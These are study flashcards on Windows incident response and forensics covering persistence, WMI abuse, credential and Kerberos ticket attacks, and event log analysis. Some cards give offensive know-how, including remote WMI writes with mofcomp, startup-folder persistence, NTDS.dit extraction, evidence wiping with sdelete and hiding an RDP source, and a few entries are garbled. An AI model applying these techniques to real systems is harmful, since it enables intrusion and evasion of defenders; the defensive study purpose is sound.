Disk Flashcards
How should you run Kape?
from a USB drive, it’s self contained
provides the ability to forensically extract files from a mounted drive, including hidden or locked system files. (Free)
Kape
Average breakout time in 2017
~2 hrs
Primary purpose of IR
Cyber threat intelligence. What is happening? Otherwise, they will come back. Qualifying what the adversary wants and does will stop future attacks.
Primary output of the exercise.
What is the containment phase of IR?
Preventing additional adversary actions while monitoring activity. Active defense.
Not pulling the plug while creating cyber threat intelligence.
Manual and automated scanning looking for evil
Hunting
Why is baselining important to hunting?
Have to be able to establish what “normal” looks like before you can see what abnormal is.
How does threat intelligence get to the SOC?
Generated by HFS/NFS/CFS as part of Hunt/Incident detection, signatures created are put into intelligence as a product, fed back to the SOC.
Proper threat intelligence team will arm a hunt team with:
Where to look, based on APT type activity
What to look for: signatures. Reg keys, malware footprints, IP/domains, hashes, utilities used, TTPs…
Likelihood of attack
Hunt teams should have, at a minimum
Trusted visibility into endpoints and networks across the org. (Ability to use powershell or an EDR tool to sweep the entire enterprise)
Remediation should, at minimum:
Deny adversary access to the environment
Eliminate the ability for the adversary to impact remediation efforts
Remove presence of adversary from the environment
Degrade the future ability of adversary to return
Atomic Indicators
Pieces of data that are indicators of adversary activity all on their own, such as emails, IPs, strings from C2 channnels, FQDN, etc.
Computed Indicators
Hashes of malicious files, data included decoded C2 protocols, some IDS signatures
Behavior indicators
A profile of behaviors. Bad guy likes to tunnel traffic through think tanks, use macros for word documents, targets these types of targets, and uses these types of specific computed and atomic indicators. Like a CrowdStrike profile.
How many stages is the MITRE tactic categories, and where was it derived from?
10 stages, derived from the 7 stage Kill Chain.
Control, Maintain, and Execute are broken out from the latter stages of the Kill Chain.
What is STIX?
Structured Threat Information Expression (STIX™) is a language and serialization format used to exchange cyber threat intelligence (CTI). STIX is open source and free allowing those interested to contribute and ask questions freely.
The equivalent of narrowing down a human suspect through identifying characteristics, but for adversaries
IOCs.
Open sourced community driven standard format for IoC’s
STIX
Tool aimed at (but not limited to) helping Malware researchers identify and classify malware samples. Create descriptions of malware families based on textual or binary patterns>
YARA
What is a YARA rule?
A description of strings/boolean values that help determine a Malware variant.
Tools for making IoC rules
YARA, STIX, OpenIOC
Mandiant tool for standardizing IOC’s
OpenIOC
an antivirus signature that you can control, basically
an IOC
Free tool that provides host investigative capabilities to users to find signs of malicious activity through memory and file analysis and the development of a threat assessment profile.
FE Redline
Finding fileless malware should start with
….looking for the evidence of its execution when it RUNS.
Malware that is not active but is dormant is harder to find because
We can’t detect the malware in memory
How should you structure finding evil, from broad too specific?
Automated enterprise wide sweeps that can be signature based should start early, and then using targeted EDR data and triage data should be spent only on narrowed hosts that are suspicious, as they are time consuming. More manual processes should be used sparingly.
Mechanisms for detecting compromise of systems w/o malware on them
Program execution, File opening, File knowledge, event logs, browser usage
where malware hides, and names
Like to name it svchost, explorer.exe, win.,exe; app data folders (where outlook and explorer drop stuff)
Likes to hide in temp folders, windows folders, and internet files, system volume files….
They’ll often pack it, run it through python or after converting it to text, etc….obfuscating it
Best way to combat processes masquerading as legit
whitelisting
Malware uses services such as ______ to hide in plain sight
frequent compilation, packing, and armoring. It will mimic known good services and normal windows services.
Most frequent hallmarks of malware evasion
Probably create a new service (scheduler @ cmd)
replace an existing service, like the wireless zero config service
register as an outrun process in memory
process injection
To obtain a commercial software certification (to conduct code signing) you usually need ____ at a minimum, but often ______
Passport/phone bill (something to prove identity)
a Dun and Broadstreet rating (Level of financial standing/stability); shows that your org is a stable business.
Examples of code-signing certs being manipulated
Stuxnet
opera browser manipulation that allowed access to private keys
adobe key signing cert stolen
When did MSFT start doing code signing, and on what code?
Server 2008, Drivers
Drivers give you access to what level of the O/S?
Kernel
When did MSFT start enforcing code signing for executables?
On servers: Server 2016
Workstations: windows 10
You have to turn on executable signing!
difference between corporate and business code signing cert
For corporate, you need to have a Dun financial rating (Dun and Broadstreet) Shows you have a stable business.
% of malware that’s signed
around 3.5%; higher % for nation state attacks
Downside to signed malware
If you revoke the signing cert (add it to the CRL) it would put a beacon on any version of that code in the wild. Makes rapid re-development/redeployment of code hard
How to downselect code that’s signed for investigations
You can usually ignore code signed by well known sources such as MSFT, google, apple, etc.
Finding evil in process starts with
Identifying normal processes and their locations. (Lsass.exe, taskhostw.exe, winlogon) Cross check that it lives in the correct directory/location. (such as %SystemRoot%\System32\smss.exe)
What is sigcheck?
Checks for signed code, upload to VT
What is density scout?
Checks for possible obfuscation and packing of a file. File will receive a score; this score can be used to identify whether a set of files is worth investigation.
What is pescan?
command line tool to scan portable executable (PE) files to identify how they were constructed. Various metadata is displayed, identifying items such as:
Compile timestamp
MACB timestamp
File size and type of executable
Target OS and whether binary is 32 or 64 bit
Linker version used
Entry point address and desired image base address
Whether an X509 certificate was used and who the author is
Whether there is a checksum present and does it match the binary
Optional analysis of the PE internals to generate an abormality score which compares the internal construction to the standard operating system files. Higher scores equate to larger differences.
Optional MD5 and/or SHA1 hashes of the file can be generated as part of the scan.
Built in windows command to query service configurations
sc
Places to look for evidence of program execution
Prefetch, Shimcache, userassist registry keys, and jump lists.
Places to look for evidence of program execution
Prefetch, Shimcache, userassist registry keys, and jump lists.
Indications of odd behavior from seemingly normal OS artifacts could include
cmd.exe exeuction
Sysinternals tools usage (psexec, procdump, psloggedon)
at.exe or schtasks.exe execution (Persistence)
wmic.exe, Powershell.exe, or winrm.vbs execution
net.exe use, used for mapping drives or lateral movement
reg.exe or sc.exe (addition of run keys or services)
mount points2 registry key: records shares such as C$, Temp$, etc
.job files in C:\Windows\Tasks: odd application tasks executed
Where would you see an adversary adding new run keys or services?
Use of reg.exe or sc.exe
Where are some MSFT native tools an adversary might use for persistence or lateral movement?
Sysinternals tools (psexec, procdump, psloggedon) or net.exe (network)
When looking for malicious processes, some anomalous characteristics might include?
starting with wrong parent process image executable in wrong path misspelled processes incorrect sid (starting from wrong account) Processes with unusual boot times Unusual command line parameters packed executables
How does density scout work?
tries to compress a file; parts of the file that are obfuscated or encrypted won’t compress. Finds parts of files that have high frequency letters (usually encrypted) content or high entropy. (randomly generated)
You can usually compress standard EXEs very well (50%+) anything less than 10% compression represents concern.
What Is temporal analysis?
fancy term for “time lining”
How to use google post density scout to further check executables with low compression rates?
Look to see how common they are. Google/VT; put the full path into google. (If there’s zero hits, or even a recommendation, it will have a hit)
Technique that obfuscates or encrypts data or software and encapsulates it into a file along with a program to perform decryption/deobfuscation
packing. a “packed executable” is a piece of software with an unpacking program.
PEscan looks for what?
Code anomalies. Will present why it thinks the executable is weird, in the notes, and providing a rating. Compile data can be interesting….as is the CPU type. (32-bit code is unusual)
Where does 32 bit programs run from?
Syswow64, if they’re standard windows processes
Where do 64 bit programs run from?
System32==
Verifies that images are digitally signed, provided the root certificate store is updated.
Sigcheck
Checks VT detections while verifying code signing
sigcheck
Two hives that autoruns most often usually live in, and when are they usually executed?
NTUSER and Software; executed when a user logs on
How does an adversary manipulate the userinit registry key?
This key (in the Software hive) is used by Winlogon to execute explorer.exe and userinit.exe, at startup.
Greatest hits for places to stick persistence mechanisms (WADSSS)
W-MI Event Consumers A-utostart locations A: GPO, MS-Office add-ins, BIOS. D-LL's (DLL hijacking) S-ervice creation/replacement S-ervice failure/recovery S-cheduled taskss
What are runkeys?
AEPs. Autostart Execution Points. Things that start with the O/S. Frequently abused.
File system location that (and those like it) that can be used to launch attacks, not requiring admin credentials.
%AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Tool used for evaluating registry runkeys for maliciousness
RegRipper
How to get malware to execute from a software link in user space (where to put it)
%AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup; shortcuts in here will link and execute to representative binaries
How are MSFT services used as persistence mechanisms?
They replace unused services with malware, or modify an auto-start to include a new binary, or manipulate service recovery features (like dr. Watson)
How are MSFT services used as persistence mechanisms?
They replace unused services with malware, or modify an auto-start to include a new binary, or manipulate service recovery features (like dr. Watson)
What is DLL Search order hijacking?
Putting a DLL with the same name in the directory of a core DLL, so it launches ahead of the existing DLL.
Traditionally, search-order hijacking attacks
utilize an executable file’s DLL search path to load
spoofed DLLs through the known DLLs record.
What is phantom DLL hijacking?
Inserting a DLL into a place where it would normally exist, but doesn’t. List of “known” DLLs for all the windows variants kept at KnownDLLs, and will include DLLS not found in that version. IE, for Windows 2016 R2 server, inserting a DLL that would normally be there but isn’t turned on/used for that build; when windows sees that DLL exists at startup, it will launch it.
Great example is replacing the FaxDLL (fxsst.dll) in the system32 folder.
What is DLL side-loading?
Getting a new version of a legit-DLL loaded into the system. Part of the dynamic update features of Windows, just like a Web 2.0 AJAX style query.
DLL side-loading, in contrast to search order hijacking, utilizes the WinSxSn assembly to load the malicious DLL from the SxS listing, which is located in the following registry key:
%TEMP%\RarSFX%\%ALLUSERS PROFILE%\SXS\ or
%TEMP%\RarSFX%\%ALLUSERS PROFILE%\WinSxS\
What does the Sysinternals Autoruns tool do?
Easy means to collect and analyze services on a system. Similar to SC. Will also collect currently scheduled jobs.
What can schedule tasks on remote systems?
both at.exe and schtasks.exe
How does a WMI event work?
- Create an event filter, that “triggers” based on an event occuring (for example, run every 20 seconds)
- Once triggered, an event consumer is added to the system with a script and/or executable to run (run this PS script to beacon to a backdoor)
- Finally, tie the event and consumer together as a “binding” and enter it in the WMI repository
File used to register new object classes into the WMI registry
MOF file (managed object format)
Where was the first big WMI based attack? How was it executed?
Stuxnet
A zero day (print spooler service) was exploited to deliver an EXE and an MOF file. The MOF file was auto-compiled by the system, creating a WMI event and consumer that immediately executed the malicious executable.
Native way to interrogate WMI for suspicious behavior
Powershell:
Get-wmi-object
Command line tool to look at windows malware persistence mechanisms?
autorunsc.exe; goes through and analyzes, like sigcheck,. (doesn’t do dll hijacking or service failure)
What does I E X indicate in memory?
Something to be concerned about. IEX is the “Invoke Expression” cmdlet, which takes the argument of a script and executes it. Often used to download the malicious script, which then gets passed in to PS. Evades many A/V tools.
What does I E X indicate in memory?
Something to be concerned about. IEX is the “Invoke Expression” cmdlet, the underlying .net command is
“Net-Object.System.Net.WebClient) which takes the argument of a script and executes it. Often used to download the malicious script, which then gets passed in to PS. Evades many A/V tools.
What is a download cradle?
A download cradle is a single line command for download and code execution. … A download cradle can also be part of a persistence mechanism, tooling or execution at other attack stages when an attacker attempts to download capability or run fileless
Can be used to interrogate local and remote systems for processes, network configs, etc
WMI + WMIC
How does WMI authenticate?
Non-interactively. (Network logons)
What’s the problem with many EDR platforms?
Doesn’t do historical well; mostly live, in place. (The LR functionality is FE using Redline for the historical)
Should you turn off Powershell remoting in your environment?
If you do, you’re likely using something less secure. (PSEXEC) It’s no more dangerous than RDP/RPC. Powershell remoting is MUCH more secure.
Powershell commands are based on?
.NET framework objects, which mean the objects carry multiple aspects or properties of the command. (Cmdlets)
How does Powershell handle command output?
By encapsulating it in objects, which can be passed to other cmdlets for additional processing. One cmdlet might make an array of objects for computers, files, network objects, the next might groom out the files, next might perform actions on those files.
What is a Powershell provider?
how Powershell abstracts collections of items into containers. For example, “Get-ChildItem HKLM:Software” would abstract all the registry keys in that hive to an object.
Windows alternative to Secure Shell
PSSession: ps for secure remoting
PS command used as one-to-many option for executing one command on multiple remote systems
Invoke-Command (E I X)
Sends commands without an interactive session being established.
Why PS is more secure than RDP/PSexec
It doesn’t cache credentials; only vulnerability is to things like ticket attacks
How do you use PS to send a series of commands remotely?
invoke-command, then use a -scriptblock parameter, or -filpath to have it run from a local file.
Doesn’t need to set an array to loop through data.
Why is Invoke-Command better than looping through an array of systems on the server running it?
The former uses the resources of the target to execute the commands, the latter relies on the processes/power of the invoker.
Why do we avoid CredSSP in Powershell?
It caches the credentials so that it can pass them to a 3rd party/system that requires it; similar to SSO.
Creds aren’t cached otherwise, so Mimikatz/Incognito can’t steal them.
How does Kansa work?
Organized collection of scripts andl modules and scripts into a framework for IR purposes. Much of it PS, but can execute anything. Uses PS for remoting.
two prereqs for Kansa
your account must have admin privs on the remote host windows remoting (WinRM) enabled.
All the plugins that Kansa runs are located where?
./Modules folder
All the analytics that Kansa can run on collected data is found where? How does it work?
./Analysis
All of the ways that it will crunch that data produced by the Modules in Kansa are listed in individual Analysis scripts. You can enable and disable ones you want it to run at the end of a pull, or run them ad-hoc.
Why should you look at when a potential C2 domain was registered?
If it’s been around a long time, it’s less likely to be used as C2 unless the adversary is just holding it for a long time. (Infoblox will block recently registered domains tho, so smart bad guys will hold them past that time)
What are Kansa analysis features that have “stack” in the name?
It’s the stackable feature of Kansa. If you see 30 hosts that have a specific run key, it will provide a “counter” for that occurrence across the environment.
Frequency analysis scripts.
how to use 3rd party binaries with Kansa, and where it needs to be told to run it
Put the binaries you want to run in the .\Modules\bin and when executing, push with -pushbin. Remove them after with -rmbin
Must add the tool as a BINARY DEPENDENCY #BINDEP in the collector script. Even commented, it will run
How to bring memory analysis into Kansa (to try to get
Get-RekalPsList.ps1
What is WMI for?
Windows Management Instrumentation. Deeply invasive control of the underlying Windows architecture, meant for administrative tasks in a large environment
Why is WMI traffic hard to detect?
It exists for uses in every stage of the kill chain
It’s largely only in memory
Windows native, minimal logging of actively
evades whitelists
scripts can be obfuscated when run through it
encrypted
runs over standard PScom/WinRM pipes
WMi for recon
List user accounts, groups, netuse lists, list of fixes and patches installed, etc
Why is WMI the real fear, not PS?
Powershell has history and logging. WMI is often the underlying commands being run, and usually silently.
There’s no automatic logging for WMIC commands by default
Examples of WMI for priv esc
Powershell Empire has multiple WMI tools for finding services running in the wrong directories or with elevated privs, that could be manipulated. Also looks for services that have a space and aren’t quoted, where you could inject other services.
WMI process for lateral movement
WMI Process Call Create: used by NotPetya and BadRabbit uses to execute code remotely
How does rundll.exe let you avoid whitelisting restrictions?
It’s the valid app that calls DLLs; if you want to run a malicious DLL, you could invoke this manually to call another DLL, thus skipping some whitelist controls.
WMI persistence mechanism
Creation of Event Consumer Backdoors. (Embedded in WMI database) is there an event/trigger condition (MOF file) that doesn’t belong?
Ways to create entries in WMI database for persistent attacks
Use PowerShell or mofcomp.exe
NotPetya uses ______ to spread it’s payload
Direct RCE for systems accessible via WMI Process Call Create.
Also uses Remote shares accessible via NetEnum/Netadd to spread its payload
Ways to identify WMI commands for cyber reconstruction efforts (how to catch WMI attacks)
Enable Event logs (will fill up your logs QUICK)
Sysmon has its OWN event log (better)
Use PowerShell to discover suspicious events
Commercial EDR tools (Carbon Block, Tanium, HX) (best)
3 things PS can be used to look at to find malicious use of WMI
Looking at:
- event filters (Trigger)
- EventConsumer (Script or executable to run)
- FilterToConsumerBinding (binding, storage, persistence)
3 Tool for exploring WMI database
WMI explorer tool (wmie2)
Mandiant WMI-Flare tool (Offline parsing)
Mandiant PyWMIPersistenceFinder
WMI forensics scripts
Two WMI events to search for first
ActiveScriptEventConsumer - execute a predefined script
CommandLineEventConsumer - Launch an arbitrary process (more common: launch a download cradle)
Focus on consumers!
What is a MOF File?
Think of it as text file representing the WMI definitions and instances.
Used for rebuilding and recovering the WMI database. Found in WMI repository.
Why is Mofcomp.exe dangerous?
Can use it to create WMI objects from anywhere; doesn’t NEED to reside in the WMI repo or even on the same computer. (-N to add remote machine names)
Can use it to rebuild WMI from another machine with arbitrary events/consumers. In this scenario, the residue isn’t even on disk, but in memory.
Student use of WMI?
You can send a MOF file to the Print Spooler, which will compile it and import it into the WMI repo. (Was just a windows service, not an exploit)
Anything you wrote in there was written in as an admin account to the backend.
Method to remote write to a WMI DB?
mofcomp -N \machinename\root\subscription test.mof
have to delete the #PRAGMA from the first line of the file
Do you need a MOF file to write into the WMI db?
No. Can write directly into it using .NET code (like PS)
When you run a MOF file from a non-standard location, it writes an artifact to:
HKLM registry, WBEM auto recover key
Seeing unusual WMI processes running
Consumer portion
look for wmipvrse (especially on non-servers)
Look for wmipvrse’s parent process. (Should be svchost!)
Look for wmipvrse spawning things like cmd/ps
Active script portion
Look for scrcons.exe
RARELY SEEN!
Hunting for WMI activity involves what
Looking for WMIC call create /node: invoke-wmimethod or invoke-CimMethod (PS) wmiprvse with unusual parent wmipvrse with unusual children (like PS) scrcons.exe running PS with encoded commands
Some of the event logs for credential harvesting
4624 (Logons)
4720 (Account Creation)
4776 (Local account authentication)
4672 (Privileged account usage)
What is protected processes, and when was it introduced?
Windows 8: Protected processes can only load signed code and can only be attached to other protected processes.
Why is protected process easy circumvented
It’s not on by default, and Mimikatz gets around it via a signed driver.
Remote credential guard does what?
Update to restricted admin: protects any account (not just admin) during RDP sessions.
Windows 8 integrated a lot of protections for _____ that no one integrated
Credential protections, via KB2871997. (Backport to Windows 7)
Why isn’t credential guard used pervasively? What does it do?
It’s hardware heavy; works with virtualized sandboxes. Has a lot of work to do for exceptions.
What is the core Active Directory authentication protocol used for users?
Kerberos
and
NTLM (for using local accounts, network logon w/SMB vs domain creds
An authenticated credential is composed of:
an identity and an authenticator (secret)
Create accounts to target on a local box when searching for a credential that can be used on other boxes
cached creds for users (ie, Joe on computer a has logged in via NTLM on another box, and his creds are cached there)
Helpdesk account (pushed to every box for local admin work)
Administrator account (if it hasn’t been randomized as part of build, with sysprep)
Challenge for hackers with local system creds that have been cached.
They’re encrypted and salted, so have to be offline cracked, unless you’re passing the hash. If you do crack them, you have the password, so you don’t need to pass the hash.
Attacking a local system for creds, what FOUR forms can the credential take?
Stored cached credential
NTLM Hash
Token
Ticket
NTLM pass the hash works specifically in what way?
The threat actor has access to a box, find a LOGGED IN system user, accesses the stored credential in the form of the NTLM hash, and then accesses another machine that has that account cached; when it asks the first box for the cred, the hash is passed over. Requires a logged on user, another machine that has that same user cached, and access to the hash.
How does Windows 8.1 introduce defense against Pass the Hash attacks?
Starting at 8,1, any priv account is not allowed to do a network logon over NTLM, with the exception of the default administrator account.
(Why you dont clone computers)
Caveat to a local cred in the form of a hash, token, or ticket being dumped?
It must be for a user that is LOGGED ON, or the process is still running
domain account hashes are stored where during interactive sessions
memory
How do you defend cred theft, locally?
Monitor admin accounts/boxes
Stop remote interactive sessions w/Admin accounts
Properly terminate RDP
Windows 10 (cred guard, tspkg, domain protected users group)
Credential guard defends creds by moving them
…from LSASS to a hypervisor controlled isolated process.
What privileges are required for any system you’re trying to steal a token from?
SeImpersonate or Delegate. (or admin privileges necessary to add those permissions)
Type of token that facilitates authentication even across network resources?
Delegate tokens
Can be used w/PSExec to map remote admin shares
Type of token that allows for local security context shifts
Impersonate tokens. (SeImpersonate)
If a token is present on a system, a user with the SeImpersonate privilege can do what?
Extract the token
Reuse it to manage group membership or add users
Escalate local privileges
Power “delegate” tokens are only available to an attacker when _______
Console logons, RDP, using “Run As” on the machine.
Smart additional ways to defend token theft on endpoints
“restricted admin” prevents tokens from being available on the machine during remote admin sessions (which should be avoided, anyway)
Remove delegation of high value accounts in AD
Use group policy to set time values for sessions, after which it disconnects (to prevent improperly terminated RDP sessions
Cached domain credentials are stored in
SECURITY\Cache reg key
To prevent a situation where a user cannot logon, windows ____________
caches the last 10 logon hashes. (25 for 2008+)
Format of cached credentials on modern Windows systems
mscash2
How long do cached credentials live?
indefinitely, even after a reboot.
Creddump can be used to?
extract hashes off-line, to be cracked
Why we shouldn’t clone endpoi nts
Creates a standard admin, same RID, which can be used in credential theft/lateral movement very easily
Unique ways to limit attacks on cached credentials
Minimize amount of cached accounts
Use Protected Users group
NSA/DoD recs for cached credential limit
0-1 (NSA)
<4 (DoD)
What does Nishang PS framework allow analysts to do?
through Get-Lsasecret.ps1, can dump and decrypt the LSA secrets. These secrets, if they’re privileged incorrectly, can let a service account be used to exploit escalation of privilege. (looking for overprivileged service accounts)
Can be combined with ticket requests (kerberoasting); offline the ticket, crack it, and use it with the service account.
Often used for looking for overprivileged accessible domain service accounts. (badly installed agents, etc)
Nishang Powershell framework (pulling encrypted service account details from LSA)
Kerberoasting to marry that account with a ticket for its use
Unique ways to defend against LSA attacks
dont employ services or schedule tasks requiring domain administrative trusts
reduce number of services that require domain accounts
Group managed services, through “Group Managed ServiceAccounts”
How do you acquire a golden ticket? (kerberos)
Stolen from memory
kerberos ticket w/o an expiration date, and has domain admin.
What is kerberoasting?
request tickets for service accounts: they send you the ticket for a service account, you roast it(crack it) and then reuse it
When does a golden ticket expire? What can it be used for?
Expires when the krbtgt is rotated. Changing other credentials is meaningless
What does managed service accounts do, and when was it introduced?
Server 2008R2
Introduces frequent password changes and long passwords
How can you flexibly utilize a dumped ticket, as a “transplant” ?
If you dump a privileged ticket, you can export it from the system, dump it into Mimikatz (or other utilities) and then import it into another system, where it will be cached and available
Key weakness that allows kerberoasting to work
ANY user can request a ticket from a DC for ANY service
The ticket returned for the service has a non-salted hash for the account that runs the service.
This password can be easily cracked offline
Dangers of Golden Ticket to defenders
- If an attacker loses access, ANY user-level access to a domain joined system will provide a mechanism to re-use the golden ticket to get priv access again using Pass the Ticket.
- Works even if a full password reset is conducted for all enterprise accounts
- Attack can be constructed with access to either the NTDS.dit or memory. (attacker must have Admin access on a DC to get this)
An all-access ticket for a single service or computer is referred to as a
“Silver ticket”
Why are silver tickets so effective?
they’re excellent backdoors: auth occurs without requiring comms with the DC. Attacks a computer account password.
What is a Skeleton Key for AD?
After gaining access to a DC, a tool like Mimikatz can “patch” LSASS to enable a backdoor password for any valid domain user.
It’s a SECONDARY password for the account; even if they change the primary, the secondary remains available.Easy and persistent backdoor for access.
Unique ways to defend against ticket attacks
Credential guard/Remote credential guard
Long and complex passwords on service accounts
Audit service accounts
Regularly change the KRBTGT password (no more than yearly
What does a hacker gaining the NTDS.dit do, and how do you get it?
Gains access to all the user and computer account hashes, which are encrypted. (though the encryption is easy to break)
Easiest way to get to a users personal access/drives/phones/computers,
How to get around the locked NTDS.dit file, when trying to export it?
use Volume Shadow Copy service.
Tools for extracting the NTDS.dit, and where is it?
\Windows\NTDS
Can be ripped by: ntdsutil NTDSXtract ntdsdump VSSAdmin PS Metasploit
Why use NTDS.dit for action on objectives?
Often, using admin credentials are noisy: if you have the NTDS.dit, you can natively log in as a user and see what they see, have access to their browser, OneDrive, phone, etc. Less noisy.
What is located inside every prefetch file?
The total number of times an application has been executed, the original path of the execution, and the last time of execution. (up to the last 8 times)
telemetry for execution
Why is the timestamp of the prefetch file?
It provides an extra bonus 9th “evidence of execution” for the application in question.
What’s the format of a prefetch file, and where’s it stored.
_.pf
ON WORKSTATIONS, in Stored in \Windows\Prefetch (not a server service)
Up to 128 files on
What does prefetch do?
Meant to give a process an extra bit of juice when it executes, next time will launch quicker/more efficiently. (On old hard drives, it would co-locate executables in close digital space so the hard drive didn’t have to scan to it)
SSDs and Prefetch?
IN windows 7, they started disabling prefetch for SSDs, but realized it was still providing efficiencies.
How would you look at the targets of sdelete?
the prefetch file for sdelete has the target of what was deleted. Doesn’t include registry keys, but file/filehandles.
How can you use frequency analysis of prefetch entries?
If there’s a huge recent amount of “living off the land” type tools, like netstat/net-use from command line, that might indicate that someone is in your space.
The first time a file is accessed is connected to the timestamp (creation) of
the .pf file.
Over time, a prefetch file may be….
Overwritten with the most recent runs of the file, or erased if the application hasn’t been used in a long time. (After which it gets re-created for a new run, with a new timestamp)
Creation of a .pf indicates
that an application ATTEMPTED to execute, not that it did so successfully.
What happens to a prefetch file if the application is run from a different directory other than standard?
It changes the hash value, because it’s been executed from a new location. (useful info!)
What does pecmd.exe do?
Pulls information on a directory or a single application for prefetch, including volume information, files and directories referenced, and all execution time info.
Difference between -f and -d for pecmd.exe
-f is for a single application, -d is a directory of applications
What is the hash of a prefetch file calculated from?
the directory path that the executable is in, and the command line options of the programs
What happens if you run calc from cmd, if cmd is launched from /syswow (32 bit folder)
Why?
it will launch a 32 bit version of the calc app. A 32 bit process can’t have a 64 bit child process.
Why should we always look at spikes in 32 bit programs (things running from syswow)
Because bad guys write a lot of malware in 32 bit, and a lot of child processes are launched in 32 bit as well, which is unusual for system activity
Filter = _____
Consumer = _________
Binding - _________
Trigger
Action
Host it runs on
How do you use sdelete to fully wipe forensic evidence of prefetch, including unallocated space?
Sdelete has a -z option, to zero-ize unallocated spac.e
If bad guys have deleted prefetch, zeroized unallocated space….what option is left to find evidence of the app execution?
Volume shadow copy (provided they didn’t turn VS off/on again or memory (volatility can pull prefetch)
pecmd can use a -vss option to also look in volume shadow copy at run
What is Application Compatibility/Shimcache, and why does it matter forensically?
Designed to detect program compatability challenges. (Apps should be able to run in any version of Windows, but that’s hard)
What is in shim cache?
All the application files, AS they’re run, that have been checked for compatibility/shimmed
When an app is shimmed, what is written?
the last modification time of the executable
the full path of the exe
(not when it was shimmed, when it was executed)
Also, when explorer browses the folder with the executable, and it’s shown in the gui (weird) You hav etc see it with your eyeballs
Every time psexec is run, what happens on the remote machine?
a new version of psexsvc is pushed to that machine. The NEW version gets shimmed every single time, even though it’s overwriting the same file. (good to know)
What forensic evidence is created when an executable is renamed?
an entry in the shimcache, because it’s shimmed again
When you move a file, what cache entry is updated?
shimcache
WHEN is the shimcache written to registry and directly accessible?
On shutdown. Prior to that, shimcache entries exist only in memoruy
What is the significance of the shimcache “insertFlag”
a Flag in the registry flag that means that confirms the application was executed; if the flag is empty, it likely wasn’t.
While shimcache may not give you the date/time executed, parsing it gives you…
the temporal order. What executables ran in what order, starting most recently to most distant, historically.
Amcache tracks what things?
Programs installed, programs executed
Where does amcache live?
amcache.hve (registry) at C:\Windows\appcompat\programs\amcache.hve
and
Within that hive, a Root\File{Volume GUID} which tells you where the executable was run from, volume wise.
What do the keys under each {Volume Guid} in each amcache entry represent?
Each key represents a numerical value, which each represents another executable. Key # is a combo of the MFT entry and a sequence number. (written in hex) Parsers can break that out.
What extra piece of data is included with the executables symbol in the amcache?
a SHA-1 hash for it.
What is wiiprvse indicative of in shimcache, elsewhere?
indicates client is receiving a remote WMI command
Where would you go to look at what explorer directories a threat actor navigated to, and using what artifacts?
Shellbags (using shellbags explorer) and opening the userclass.dat file (found in the user’s home directory)
E\C\users\AppData\Local\Microsoft\Windows\userclasss.dat
Where are event logs stored?
%systemroot%\System32\config (older)
%systemroot%\System32\winevt/logs (modern)
Where do we see evidence of services starting/stopping/etc?
The System Event log
Where do events forwarded from other systems get logged?
Forwarded events log
Number of logs found on a modern windows machine
150+ Application, Security, System are only 3.
What are some examples of Windows services that get their own logs?
Defender
Firewall
Task Scheduler
What updates the security event log?
Only system (LSASS); third party apps don’t log to this log facility
What is logged in the security event log?
Auth attenmpts User behavior/actions File/folder/share Security Settings modifications LSASS process Processes (manually?)
Difference between a logon/account logon event?
Logon event: user logon (where the logons are tracked at): You going through TSA and showing ticket/ID
Account logon event: Authentication event (board the plane) Security checkpoints! (Where did you authenticate)
What security event is like a TSA gate check agent scanning your ticket?
an account logon event, or “authentication event”
Account event you’ll see most frequently (most important)
4624 and 4625, successful vs. failed logon
Event id using other creds (potentially stolen)
4648 (logon using explicit creds)
Privileged user logon event
4672 (VIP in the room!)
Suspicious of events that are mapping to C$ or admin$ shares
You’ll need the pairing of a Successful logon (4624) and 4672 (superuser/priv account logon)
Problem with logoff events in Windows, forensically, and how to adjust course
They aren’t reliably recorded (as 4634, logoffs) so look for 4647.
Logon events aren’t recorded when….
malicious activity is used to access a system. Backdoor, exploited service, or similar.
Logon codes tell you
HOW the user logs into the system (IE, 7 is RDP, VNC/Console is 2, cached ares to logon is 11, etc)
Non-interactive logons are what logon type?
3; network logon
When a user logs on using a domain account through the console, it produces cached logon events. Why?
MSFT tries to reduce the traffic to the DC and sometimes defaults to cached creds, even when the DC is online.
How to relate a logon to a logoff, in event viewer
Use the Logon ID value; creates “parenthesis” on the front and back end of a session
Session lengths are good to establish for what types of logons?
interactive
Every domain joined system will have THIS directory created, accessible via interactive login
$: Account is used when communicating with AD and accessing network resources
What is the built-in “NETWORK SERVICE” used for?
Assigned to processes or services that need network access
4670, after a successful logon, indicates what?
Enumerate the privileges coming with you.
Important to track what activity for event logs of privileged account activity during logon, and why?
Not just a member of an admin group, but the additional privileges assignment (as part of event id 4672) that indicates that after the logon, special creds were assigned that COULD BE IMPERSONATED IN TOKEN ATTACKS
What privilege assignment at logon time is indication that the account used was ripe for token based attacks?
4672, where things like SeTakeOwnership, SeDebug, and SeImpersonate are admin-equivalent.
4720 events should be looked at because….
they indicate account creation happened, which can be an easy true positive.
Some of the RDP connection log info is also recorded
In auxiliary logs Remote Desktop-Services-RDPCoreTSZ and TerminalServices-RdpClint
How to actually obfuscate the RDP Client Address
The RDP client/server connection will document the source IP, so if you don’t want it to show your actual IP, you have to chain RDP; jump from host to host.
Important place to find log data regarding RDP services, that are recorded on the source system
Windows-TerminalServices-RDPClient\Operational
one of the only places that you get discrete source logging (where did the RDP session connect to)
Only time we see the Account logon and Logon events in sequence
When a user is logged on locally, NTLM style, ro a workstation or group
account logon events refer to….
The third party authorization of creds provided during that logon session. (Authentication vs logon)
Checks for user credential against the DC would be an account logon type.
“holy trilogy” of event data that corresponds to a pass the hash PTH attack
4776: Root account authenticated from workstation (account logon)
4624 Successful account logon
In that logon, the type of logon is network
New events in Win 10/2016 that track enumeration/recon of group accounts
4788/4799, groups were enumerated
event logs (groups) that can help identify bloodhound or powerview use
Look for the enumeration of group membership (not turned on by default)
Benefit of Event log explorer
Tolerant of log corruption
filtering
free
How to monitor for access to shares, and objects accessed over those shares
Network share event logs
5140/5145. Have to be turned on!
Runas events (4648) are unusual, in that
they are often recorded on the originating system, versus the target system. (A logon attempt was made using explicit creds….or, RunAs)
Occasionally recorded on both, such as when RDP connections use different crds..
Places where scheduled tasks are recorded
Task Scheduler, Security, and Tasks folder (Windows\System32\Tasks
Locally, remotely and in the “tasks” folder, where the registration/creation of tasks is put.
Command line to manipulate services remotely
sc.exe /remote system name, etc
service control
One service related event that isn’t recorded to system
new service installed (4697) goes in the security log
Tools that added capability to manipulate event logs
Mimikatz and Dandersprintz, post eternalblue
Mitigation techniques for event log manipulation
Event log forwarding
Logging “heartbeats”
log gap analysis
